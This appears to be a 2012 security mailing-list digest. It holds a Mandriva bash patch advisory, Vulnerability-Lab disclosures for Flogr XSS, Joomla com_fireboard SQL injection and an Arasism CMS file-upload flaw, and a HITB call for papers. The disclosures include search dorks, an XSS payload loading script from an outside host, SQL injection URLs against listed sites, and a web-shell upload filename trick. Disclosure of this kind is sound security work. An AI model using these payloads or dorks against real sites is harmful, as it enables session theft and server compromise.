[ MDVSA-2012:128 ] bash
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2012:128 http://www.mandriva.com/security/ ___ Package : bash Date: August 9, 2012 Affected: 2011. ___ Problem Description: A vulnerability was found and corrected in bash: A stack-based buffer overflow flaw was found in the way bash, the GNU Bourne Again shell, expanded certain /dev/fd file names when checking file names (#039;test#039; command) and evaluating /dev/fd file names in conditinal command expressions. A remote attacker could provide a specially-crafted Bash script that, when executed, would cause the bash executable to crash (CVE-2012-3410). Additionally the official patches 011 to 037 for bash-4.2 has been applied which resolves other issues found, including the CVE-2012-3410 vulnerability. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3410 ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-011 ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-012 ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-013 ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-014 ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-015 ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-016 ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-017 ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-018 ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-019 ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-020 ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-021 ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-022 ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-023 ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-024 ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-025 ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-026 ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-027 ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-028 ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-029 ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-030 ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-031 ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-032 ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-033 ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-034 ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-035 ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-036 ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-037 ___ Updated Packages: Mandriva Linux 2011: e855aeda31d44a58bcc5690c3fb32498 2011/i586/bash-4.2-9.1-mdv2011.0.i586.rpm 78bbd74e7af07ce4be8f07901a05e05e 2011/i586/bash-doc-4.2-9.1-mdv2011.0.i586.rpm dedc630238e16c08a0748d4ab0ecf4e8 2011/SRPMS/bash-4.2-9.1.src.rpm Mandriva Linux 2011/X86_64: af9fdfc0bfb3e393f363a25c136ed3f0 2011/x86_64/bash-4.2-9.1-mdv2011.0.x86_64.rpm 7aba42d877ae9c60cc7ac1c82425f500 2011/x86_64/bash-doc-4.2-9.1-mdv2011.0.x86_64.rpm dedc630238e16c08a0748d4ab0ecf4e8 2011/SRPMS/bash-4.2-9.1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iD8DBQFQI58WmqjQ0CJFipgRAlxnAKDZTuwrtKBg7lTqWVw6W2jMoD1aBACglBV9 Jde58aJNBfunTIh0ejx4sLc= =AkQf -END PGP SIGNATURE-
Flogr v2.5.6 v2.3 - Cross Site Script Vulnerabilities
Title: == Flogr v2.5.6 v2.3 - Cross Site Script Vulnerabilities Date: = 2012-07-11 References: === http://www.vulnerability-lab.com/get_content.php?id=656 VL-ID: = 656 Common Vulnerability Scoring System: 2 Introduction: = Flogr is a flexible script that displays your flickr photos in a customizable photo gallery you host on your website. If you use flickr but want to have a different look and feel for your photo gallery you may like flogr. Customizable photoblog interface for your flickr photos Display all flickr photos, only photos with certain tags or only certain photosets Displays photo details, EXIF data, tags, geo location, and photo comments Thumbnail viewer displays photos by date taken, photoset, and tag Embedded Slimbox photo slideshow Map view of your geo tagged photos Flickr tag cloud page RSS 2.0 support (Copy of the Vendor Homepage: https://code.google.com/p/flogr/ ) Abstract: = The Laboratory Researcher (Nafsh) Ehram Shahmohamadi (sec-lab.ir) discovered mutliple non persistent Cross Site Scripting Vulnerabilities in the Flogr v2.5.6 v2.3 photo gallery CMS. Report-Timeline: 2012-07-11: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Medium Details: Multiple non persistent cross site scripting vulnerabilities are detected in the Flogr v2.5.6 v2.3 photo gallery CMS. The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with high required user inter action or local low privileged user account. The vulnerabilities are located in the recent.php index.php with the bound vulnerable tag parameter. Successful exploitation can result in account steal, phishing client-side content request manipulation. Vulnerable Module(s): [+] Recent Listing [+] Index Listing Vulnerable File(s): [+] Recent.php [+] Index.php Vulnerable Parameter(s): [+] Tag Proof of Concept: = Dork(s): inurl:tag= powered by flogr v2.3 inurl:tag= powered by flogr v2.5.6 inurl:tag= powered by flogr v1.7 PoC: http://[TARGET]/recent.php?tag=[CROSS SITE SCRIPTING] http://[TARGET]/index.php?tag=[CROSS SITE SCRIPTING] Reference(s): xxx.com/recent.php?tag=%22%3E%3Cscript%20src%3d//xxx.com/s%3E%3C/script%3E xxx.com/bigpictureproject/index.php?tag=script src%3d//xxx.com/s/script xxx.com/flogr/recent.php?tag=script src%3d//xxx.com/s/script xxx.com/recent.php?tag=%22%3E%3Cscript%20src%3d//xxx.com/s%3E%3C/script%3E Risk: = The security risk of the client side cross site scripting vulnerabilities are estimated as low(+)|(-)medium. Credits: Nafsh - Ehram Shahmohamadi - (resea...@sec-lab.ir) [www.sec-lab.ir] - TEAM K0242 Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team the specific
Joomla com_fireboard - SQL Injection Vulnerability
Title: == Joomla com_fireboard - SQL Injection Vulnerability Date: = 2012-07-11 References: === http://www.vulnerability-lab.com/get_content.php?id=655 VL-ID: = 655 Common Vulnerability Scoring System: 7.3 Introduction: = Joomla is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets and a model–view–controller (MVC) Web application framework that can also be used independently. Joomla is written in PHP, uses object-oriented programming (OOP) techniques and software design patterns, stores data in a MySQL database, and includes features such as page caching, RSS feeds, printable versions of pages, news flashes, blogs, polls, search, and support for language internationalization. Joomla had been downloaded 23 million times. Between March 2007 and February 2011 there had been more than 21 million downloads. As of November 2011, there are over 8,600 free and commercial extensions available from the official Joomla! Extension Directory and more available from other sources. (Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/Joomla) Abstract: = The Laboratory Researcher (Nafsh) Ehram Shahmohamadi (sec-lab.ir) discovered a SQL Injection Vulnerability in the com_fireboard module of the joomla CMS. Report-Timeline: 2012-07-11: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = High Details: A SQL Injection vulnerability is detected in the com_fireboard module of the joomla Content Management System. Remote attackers low privileged user accounts can execute/inject own sql commands to compromise the application dbms. The vulnerability is located in the com_fireboard module with the bound vulnerable func fb_ parameter. Successful exploitation of the vulnerability result in dbms (Server) or application (Web) compromise. Vulnerable Module(s): [+] index.php?option=com_fireboard Vulnerable Parameter(s): [+] func fb_ Proof of Concept: = The sql injection vulnerability can be exploited by remote attackers without user inter action with low privileged user account. For demonstration or reproduce ... Dork(s): inurl:id= intext:/com_fireboard/ PoC: http://[TARGET]/index.php?option=com_fireboardItemid=0id=1catid=0func=fb_pdf'[SQL-INJECTION] Reference(s): xxx.com/index.php?option=com_fireboardItemid=0id=1catid=5func=fb_pdf'[SQL-INJECTION] xxx.com/2012/index.php?option=com_fireboardItemid=79id=1catid=2func=fb_pdf'[SQL-INJECTION] xxx.com/fireboard/index.php?option=com_fireboardItemid=38id=22111catid=16func=fb_pdf'[SQL-INJECTION] xxx.com/board/index.php?option=com_fireboardItemid=54id=70122catid=12func=fb_pdf'[SQL-INJECTION] xxx.com/jmfireboard/index.php?option=com_fireboardItemid=54id=70122catid=12func=fb_pdf'[SQL-INJECTION] Risk: = The security risk of the remote sql injection vulnerability is estimated as high(+). Credits: Nafsh - Ehram Shahmohamadi - (resea...@sec-lab.ir) [www.sec-lab.ir] - TEAM K0242 Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other
Arasism (IR) CMS - File Upload Vulnerability
Title: == Arasism (IR) CMS - File Upload Vulnerability Date: = 2012-07-12 References: === http://www.vulnerability-lab.com/get_content.php?id=657 VL-ID: = 657 Common Vulnerability Scoring System: 6.5 Abstract: = The Laboratory Researcher (Nafsh) Ehram Shahmohamadi (sec-lab.ir) discovered a File Upload Vulnerability in the Arasism CMS. Report-Timeline: 2012-07-12: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = High Details: A File Upload vulnerability is detected in the famous iranisch Arasism.com Content Management (Panel) System. The vulnerability allows an attacker (remote) with low privileged user account to bypass the picture upload validation when processing by including own .asp/.php files. Successful exploitation of the vulnerability result in malicious file uploads (malware or webshells) to compromise the application dbms application system. Vulnerable Path: [+] ../sysop/ Vulnerable File(s): [+] RTE_popup_file_atch.asp Proof of Concept: = The remote file upload vulnerability can be exploited by remote attacker without user inter action. For demonstration or reproduce ... Dork(s): Powered by Arasism.com Designed Powered By Hadi Farzad Powered By : www.Arasism.Com ØÑÇÍí æ ÇÌÑÇ : åÇÏí ÝÑÒÇÏ | íÔÇãÇä æÈ ÝÑÏÇ PoC: Path: ../sysop/ File: RTE_popup_file_atch.asp NOTE: To upload an asp web shell inject a filename with for example ... shell.asp;1.jpg Risk: = The security risk of the remote file upload vulnerability is estimated as high. Credits: Nafsh - Ehram Shahmohamadi - (resea...@sec-lab.ir) [www.sec-lab.ir] - TEAM K0242 Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: resea...@vulnerability-lab.com
[HITB-Announce] HITB Magazine Issue 009 - Call for Submissions
This is a call for article submissions for Issue 009 of HITB's quarterly magazine - http://magazine.hitb.org/ which will be released alongside #HITB2012KUL - The 10 year anniversary of the HITB Security Conference series in Malaysia. HITB Magazine is a deep-knowledge technical publication and we are only interested in article submissions that are a.) highly technical or b.) that discuss new and never before seen attack and defense methodology. Please send your article to editor...@hackinthebox.org Submissions are due no later than 1ST SEPTEMBER 2012. Topics of interest include, but are not limited to the following: Next Generation Attacks and Exploits Windows 7 / Windows 8 Security Vulnerabilities Apple / OS X / iOS Security Vulnerabilities SS7/GSM/PSTN Telephony Networks SIP / VoIP Security HSDPA / CDMA Security / WIMAX Security / LTE Security Physical Security / Locks / Safes Security of WLAN, GPS, HAM Radio, Satellite, RFID, Bluetooth, NFC Applications of Cryptographic Techniques File System Security / File System Forensics Side Channel Analysis of Hardware Devices (Medical Devices++) Cloud Security Network Forensics Exploit / Malware Analysis NOTE: If your article is nothing more than a thinly veiled advertisement for a new product or service your company is offering, please do not submit. On behalf of The HITB Editorial Team, we look forward to receiving your submissions. --- Hafez Kamal, HITB Conference Core Crew (.MY), Hack in The Box (M) Sdn. Bhd. 36th Floor, Menara Maxis, Kuala Lumpur City Centre, 50088 Kuala Lumpur, Malaysia Tel: +603-26157299 Fax: +603-26150088 PGP Key ID: 0xC0DC7DF8